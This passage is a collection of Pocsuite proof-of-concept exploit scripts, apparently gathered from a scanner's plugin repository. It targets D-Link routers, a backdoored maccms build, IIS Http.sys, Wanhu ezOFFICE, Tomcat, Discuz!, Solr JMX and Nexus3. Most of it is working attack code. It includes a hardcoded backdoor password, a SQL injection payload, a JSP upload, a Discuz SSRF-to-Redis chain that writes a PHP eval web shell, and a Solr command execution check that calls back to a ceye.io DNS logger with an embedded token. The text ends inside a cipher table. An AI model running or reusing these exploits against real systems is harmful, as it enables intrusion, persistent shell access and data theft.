    createDate = '2018-10-16'
    updateDate = '2018-10-16'
    references = ['https://www.anquanke.com/vul/id/1782390']
    name = 'DIR-412 日志泄漏漏洞'
    appPowerLink = 'https://www.adobe.com/products/coldfusion-family.html'
    appName = 'D-Link'
    appVersion = 'https://www.dlink.com/en/consumer'
    vulType = '信息泄漏'
    desc = '''
    D-Link DIR-412是中国台湾友讯（D-Link）公司的一款无线路由器。 D-Link DIR-412 A1-1.14WW版本中存在安全漏洞，该漏洞源于一些Web页面没有要求进行身份验证。攻击者可利用该漏洞获取路由器的日志文件，发现内网网络结构。
    '''
    samples = ['http://94.240.114.81:8080']
    install_requires = []

    def _verify(self):
        result = {}
        url = urljoin(self.url, 'log_get.php')
        log_resp = req.get(url)
        if log_resp.text and log_resp.status_code != 404:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['LOG'] = url

        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urlparse, urljoin
from pocsuite.api.request import req


class TestPOC(POCBase):
    vulID = 'N/A'  # ssvid
    version = '1.0'
    author = ['co0ontty']
    vulDate = '2019-08-12'
    createDate = '2019-08-12'
    updateDate = '2019-08-12'
    references = ['https://mp.weixin.qq.com/s/zfTzsMe_zWrsgfFDdfx87g']
    name = 'maccms 后门'
    appPowerLink = 'http://www.maccms.com.cn/'
    appName = 'maccms'
    appVersion = 'N/A'
    vulType = '后门'
    desc = ''' maccms 非官方站点的源码存在后门程序'''
    samples = ['https://152.32.134.70:443']
    install_requires = ['']

    def _verify(self):
        def verify_backdoor(backdoor_url):
            target = urljoin(self.url,backdoor_url)
            resp = req.get(target)
            backdoor_pass = "WorldFilledWithLove"
            login_data = "getpwd={}".format(backdoor_pass)
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
                "Accept": "text/html"
            }
            if "#Login" in resp.text and "Microsoft YaHei" in resp.text:
                result['VerifyInfo'] = "success"
                try:
                    log_resp = req.post(target, headers=headers, data=login_data)
                    if "whoami"in log_resp.text and "uid" in log_resp.text:
                        result['VerifyInfo']['shellpass'] = backdoor_pass
                except:
                    pass
            
        result = {}
        try:
            verify_backdoor("extend/upyun/src/Upyun/Api/Format.php")
            return self.parse_output(result)
        except :
            verify_backdoor("extend/Qcloud/Sms/Sms.php")
            return self.parse_output(result)
        else:
            pass
        

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import Output, POCBase, register_poc, requests

class IISHttpSys(POCBase):
    vulID = '89233'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2015-07-01'
    createDate = '2019-10-11'
    updateDate = '2019-10-11'
    references = ['https://www.seebug.org/vuldb/ssvid-89233']
    name = 'Http.sys Remote Code Execution'
    appPowerLink = 'https://www.microsoft.com'
    appName = 'IIS'
    appVersion = 'all'
    vulType = 'rce'
    desc = '''
    IIS 系列 Http.sys 处理 Range 整数溢出漏洞, 目前只能DOS
    '''
    
    def _verify(self):
        result = {}
        try:
            url = self.url
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", 
                "Accept-Encoding": "gzip, deflate",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Range": "bytes=0-18446744073709551615",
                "Referer": "https://github.com/whoadmin/", 
                "Connection": "keep-alive"
            }
            response = requests.get(url, headers=headers, verify=False, timeout=5)
            if response.status_code == 416 or 'Requested Range Not Satisfiable' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = "bytes=0-18446744073709551615"
        except:
            pass
        return self.parse_output(result)
    
    def _attack(self):
        return self._verify()
    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not http.sys vulnerability')
        return output
    
register_poc(IISHttpSys)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import httplib

class TestPOC(POCBase):
    vulID = '91445'  # ssvid
    version = '1.0'
    author = ['s0m30ne']
    vulDate = ''
    createDate = '2016-06-03'
    updateDate = '2016-06-03'
    references = ['http://www.seebug.org/vuldb/ssvid-91445']
    name = '万户OA webservice SQL 注入漏洞'
    appPowerLink = 'http://www.whir.net/'
    appName = 'ezOFFICE'
    appVersion = ''
    vulType = 'SQL injection'
    desc = '''
    webservice服务需要一个通信密码，但官方自己留了一个万能密码：auth.key.whir2012 可以进行添加、删除用户等操作 并进行sql注入
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def soapRequest(self, host, SoapMessage):
        webservice = httplib.HTTP(host)
        webservice.putrequest("POST", "/defaultroot/xfservices/GeneralWeb")
        webservice.putheader("Host", host)
        webservice.putheader("User-Agent", "Apache-HttpClient/4.1.1 (java 1.5)")
        webservice.putheader("Content-Type", "text/xml; charset=\"UTF-8\"")
        webservice.putheader("Content-Length", "%d" % len(SoapMessage))
        webservice.putheader("SOAPAction", "")
        webservice.endheaders()
        webservice.send(SoapMessage)
        webservice.getreply()
        reply = webservice.getfile().read()
        return reply

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        payload = "1 and 1=2 union select 1,2,@@version,4,5,6,7--"
        SoapMessage = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
   <soapenv:Header/>
   <soapenv:Body>
      <gen:OAManager>
<gen:input>&lt;root&gt;&lt;key&gt;auth.key.whir2012&lt;/key&gt;&lt;cmd&gt;syncUserList&lt;/cmd&gt;&lt;domain&gt;%s&lt;/domain&gt;&lt;/root&gt;</gen:input>
      </gen:OAManager>
   </soapenv:Body>
</soapenv:Envelop>
"""
        SoapMessage = SoapMessage % payload
        url = self.url
        if url.startswith("http://"):
            url = url[7:]
        if url.endswith("/"):
            url = url[:-1]
        reply = self.soapRequest(url, SoapMessage)
        if "正常" in reply:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Postdata'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-
# ver 7.0.81已经验证

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import random
import time


class TestPOC(POCBase):
    name = "tomcat code execution"
    vulID = ''
    author = ['sebao']
    vulType = 'code execution'
    version = '1.0'    # default version: 1.0
    references = ''
    desc = '''Tomcat代码执行漏洞'''

    vulDate = ''
    createDate = '2017-9-20'
    updateDate = '2017-9-20'

    appName = 'Apache Tomcat'
    appVersion = '7.0.0 - 7.0.79'
    appPowerLink = ''
    samples = []

    def _attack(self):

        result = {}
        return self._verify(self)



    def _verify(self):
        '''verify mode'''
        result = {}
        a = random.randint(100000, 900000)
        b = random.randint(100000, 900000)
        body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%out.println({0}+{1});%>''' .format(str(a),str(b))
        url = self.url
        resp = req.options(url+'/asda',timeout=10)
        if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
            shell_url = url + "/" + str(int(time.time())) +'.jsp/'
            resp1=req.put(shell_url,body)
            resp2=req.get(shell_url[:-1])
            c = a + b

            if resp1.status_code == 201 and str(c) in resp2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

import string
import random
import hashlib
import base64
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '91879'  # ssvid
    version = '1.0'
    author = ['p0wd3r']
    vulDate = '2016-05-30'
    createDate = '2016-06-19'
    updateDate = '2016-06-19'
    references = ['http://mp.weixin.qq.com/s?__biz=MzI0NjQxODg0Ng==&mid=2247483798&idx=1&sn=65cdf852dffd63b9d4ec41c31d9a5365']
    name = 'Discuz!利用SSRF+缓存应用代码执行'
    appPowerLink = 'http://www.discuz.net'
    appName = 'Discuz!'
    appVersion = 'X'
    vulType = 'Code Execution'
    desc = '''
        Discuz!利用SSRF+缓存应用代码执行
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):
        result = {}
        payload = ('gopher://127.0.0.1:6379/'
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
                   'a:1:{s:7:\\\"plugins\\\";s:32:\\\"system(base64_decode($_GET[c]));\\\";}}}'
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
                   ' end;return 1;" 0 %250D%250Aquit')
        vul_url = self.url + payload
        req.get(vul_url)

        web_url = self.url.rpartition('/')
        while web_url[2] != urlparse.urlparse(self.url).netloc:
            shell_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(shell_url)

            if rep.status_code == 200:

                # 该文件作为一句话的话payload会被拦截，且flush后shell会掉，所以用命令马向当前目录写入一句话
                flag = ''.join([random.choice(string.digits) for _ in range(8)])
                shell_flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
                shell_payload = 'echo \'<?php @eval($_POST[c]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
                shell_payload_b64 = base64.b64encode(shell_payload)
                req.get(shell_url + '&c=' + shell_payload_b64)

                shell_url = web_url[0] + '/' + shell_flag + '.php'
                rep = req.get(shell_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_POST[c]);'

                # 验证后恢复，避免网站无法访问
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)

    def _verify(self):
        result = {}
        #Write your code here
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        payload = ('gopher://127.0.0.1:6379/'
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'
                   'a:1:{s:7:\\\"plugins\\\";s:14:\\\"md5(' + flag + ');\\\";}}}'
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'
                   ' end;return 1;" 0 %250D%250Aquit')
        vul_url = self.url + payload
        req.get(vul_url)

        web_url = self.url.rpartition('/')
        while web_url[2] != urlparse.urlparse(self.url).netloc:
            poc_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(poc_url)
            flag_hash = hashlib.md5(flag).hexdigest()

            if flag_hash in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = poc_url

                # 验证后恢复，避免网站无法访问
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + payload_flush
                req.get(recover_url)
                req.get(web_url[0] + '/forum.php')

                break

            web_url = web_url[0].rpartition('/')

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class CORS_POC(POCBase):
    vulID = '40'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-07-10'  # 漏洞公开的时间,不知道就写今天

    author = 'arr0w1'  # PoC作者的大名
    createDate = '2018-07-10'  # 编写 PoC 的日期
    updateDate = '2018-07-10'  # PoC 更新的时间,默认和编写时间一样
    references = ''  # 漏洞地址来源,0day不用写
    name = 'crossdomain-cors'  # PoC 名称
    appPowerLink = '#'  # 漏洞厂商主页地址
    appName = 'http'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'HTTP Request Smuggling'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        crossdomain.xml CORS 跨域
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"低危"  # 严重,高危,中危,低危

    def _verify(self):
        # 定义返回结果
        # 调用指纹方法
        result = {}
        output = Output(self)
        message = ''

        from urlparse import urlparse
        # 获取漏洞IP
        targetURL = self.url + '/crossdomain.xml'#xxx.com/

        targetURL = targetURL.replace("//crossdomain.xml", "/crossdomain.xml")


        try:
            r = req.get(url=targetURL, timeout=1, allow_redirects=False)  # 禁止重定向
            if r.status_code == 200:
                if r.text.find("<allow-access-from domain=\"*\"") > 0:
                    print('发现CORS 因为crossdomain.xml中存在：<allow-access-from domain=\"*\" ')
                    message = '发现CORS 因为crossdomain.xml中存在：<allow-access-from domain=\"*\"'
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = targetURL
                    result['VerifyInfo']['Payload'] = message

        except Exception as e:
            pass

        return self.save_output(result)



    # 漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        # 判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


register(CORS_POC)


#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import subprocess
import signal
import os
import sys
import base64
import re
from string import ascii_letters

# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

# 需要ysoserial.jar包
# 需要jython-standalone-2.7.1.jar，mjet.py


'''
CVE-2019-12409
'''
class Solr_RCE_12409(POCBase):
    vulID = 'solr-CVE-2019-12409'
    appName = 'Solr'
    appVersion = 'Linux版的Solr 8.1.1和8.2.0版本'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-11-19'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-18'  # 编写 PoC 的日期
    updateDate = '2020-04-09'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/co5NdHgjPbgVUu1-hzR4gA']  # 漏洞地址来源,0day不用写
    name = 'Solr JMX RCE'  # PoC 名称
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)


    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        host, port = url2ip(target_url, True)
        
        #payload = "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
        payload = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
        #payload = "id & cmd.exe /c echo '{0}'".format(self.BANNER)

        command = "java -jar ./data/jmxrmi_1.7.jar {0} {1} {2}".format(host, port, payload)
        print(command)

        pro1 = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
     
        output = pro1.stdout.read().decode()

        #print(output)

        time.sleep(2) # 休眠2s等待ceye生成记录

        #if self.test_command(output):
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['Payload'] = payload
            return self.save_output(result)
        return self.save_output(result)


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            sub_domain = d['data'][0]['domain']
            if self.BANNER in sub_domain:
                return True
        except Exception:
            return False           


    def test_command(self, p_output):
        # 分别对应echo命令（Windows）的回显和id命令（*nix）的回显
        return re.search(self.BANNER, p_output) or "uid=" in p_output


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register_poc(Solr_RCE_12409)



#!/usr/bin/env python
#coding=utf-8

import sys
import random
import json
import base64

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2020-11753: Nexus 3 groovy injection(Improper Access Controls)
Admin access is required
This is a feature removed since 3.22.0
'''
class Nexus3_2020_11753_groovy_INJECTION_POC(POCBase):
    vulID = 'Nexus3-groovy-injection'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.2(官方说是3.21.1 and 3.22.0)'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2020-04-16'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-03'  # 编写 PoC 的日期
    updateDate = '2020-04-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://support.sonatype.com/hc/en-us/articles/360046233714-CVE-2020-11753-Nexus-Repository-Manager-3-Improper-Access-Controls-2020-04-16']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 groovy injection'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"



    def _verify(self):
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        j = {
            "action": "coreui_Task",
            "method": "create",
            "data": [
              {
                "id": "NX.coreui.model.Task-2",
                "typeId": "script",
                "enabled": "true",
                "name": "test_exec",
                "alertEmail": "77@gmail.com",
                "schedule": "manual",
                "properties": {
                  "language": "groovy",
                  "source": "println \"calc\".execute().text"
                },
                "recurringDays": [],
                "startDate": None,
                "timeZoneOffset": "+08:00"
              }
            ],
            "type": "rpc",
            "tid": 14
        }

        
        self.headers.update(self.auth())

        self.headers.pop('User-Agent')    # 删除默认UA，避免产生CSRF错误

        resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
        
        # 拿到task id
        task_id = self.get_task_id(resp)
        

        j2 = {
            "action": "coreui_Task",
            "method": "run",
            "data": [
                task_id
            ],
            "type": "rpc",
            "tid": 17
        }

        req.post(target_url, json=j2, headers=self.headers, proxies=self.proxies)

        return self.save_output(result)



    def auth(self):
        user = "admin"
        password = "admin"
        tmp = user + ':' + password
        auth = base64.b64encode(tmp.encode('ascii')).decode("utf-8")
        headers = {'Authorization': 'Basic'+' '+auth}
        return headers



    # 拿到task id
    def get_task_id(self, p_resp):
        if p_resp.status_code == 401:
            sys.exit("401 认证失败")
        d = p_resp.json()
        result = d['result']['data']['id']
        print(result)
        return result         


    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(Nexus3_2020_11753_groovy_INJECTION_POC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import socket
import time
import struct
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.poc import POCBase
from pocsuite.api.utils import url2ip


SSL_VERS = {
    "SSLv3" : "\x03\x00",
    "TLSv1" : "\x03\x01",
    "TLSv1.1" : "\x03\x02",
    "TLSv1.2" : "\x03\x03",
}

# The following is a complete list of ciphers for the SSLv3 family up to TLSv1.2
ssl3_cipher = dict()
ssl3_cipher['\x00\x00'] = "TLS_NULL_WITH_NULL_NULL"
ssl3_cipher['\x00\x01'] = "TLS_RSA_WITH_NULL_MD5"
ssl3_cipher['\x00\x02'] = "TLS_RSA_WITH_NULL_SHA"
ssl3_cipher['\x00\x03'] = "TLS_RSA_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x04'] = "TLS_RSA_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x05'] = "TLS_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x06'] = "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x07'] = "TLS_RSA_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x08'] = "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x09'] = "TLS_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0a'] = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0b'] = "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0c'] = "TLS_DH_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0d'] = "TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0e'] = "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0f'] = "TLS_DH_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x10'] = "TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x11'] = "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x12'] = "TLS_DHE_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x13'] = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x14'] = "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x15'] = "TLS_DHE_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x16'] = "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x17'] = "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x18'] = "TLS_DH_anon_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x19'] = "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x1a'] = "TLS_DH_anon_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1b'] = "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x1c'] = "SSL_FORTEZZA_KEA_WITH_NULL_SHA"
ssl3_cipher['\x00\x1d'] = "SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"
ssl3_cipher['\x00\x1e'] = "SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x1E'] = "TLS_KRB5_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1F'] = "TLS_KRB5_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x20'] = "TLS_KRB5_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x21'] = "TLS_KRB5_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x22'] = "TLS_KRB5_WITH_DES_CBC_MD5"
ssl3_cipher['\x00\x23'] = "TLS_KRB5_WITH_3DES_EDE_CBC_MD5"
ssl3_cipher['\x00\x24'] = "TLS_KRB5_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x25'] = "TLS_KRB5_WITH_IDEA_CBC_MD5"
ssl3_cipher['\x00\x26'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"
ssl3_cipher['\x00\x27'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"
ssl3_cipher['\x00\x28'] = "TLS_KRB5_EXPORT_WITH_RC4_40_SHA"
ssl3_cipher['\x00\x29'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"
ssl3_cipher['\x00\x2A'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x2B'] = "TLS_KRB5_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x2C'] = "TLS_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2D'] = "TLS_DHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2E'] = "TLS_RSA_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2F'] = "TLS_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x30'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x31'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x32'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x33'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x34'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x35'] = "TLS_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x36'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x37'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x38'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x39'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3A'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3B'] = "TLS_RSA_WITH_NULL_SHA256"
ssl3_cipher['\x00\x3C'] = "TLS_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3D'] = "TLS_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x3E'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3F'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x40'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x41'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x42'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x43'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x44'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x45'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x46'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x60'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"
ssl3_cipher['\x00\x61'] = "TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"
ssl3_cipher['\x00\x62'] = "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x63'] = "TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x64'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x65'] = "TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x66'] = "TLS_DHE_DSS_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x67'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x68'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x69'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6A'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6B'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6C'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x6D'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x80'] = "TLS_GOSTR341094_WITH_28147_CNT_IMIT"
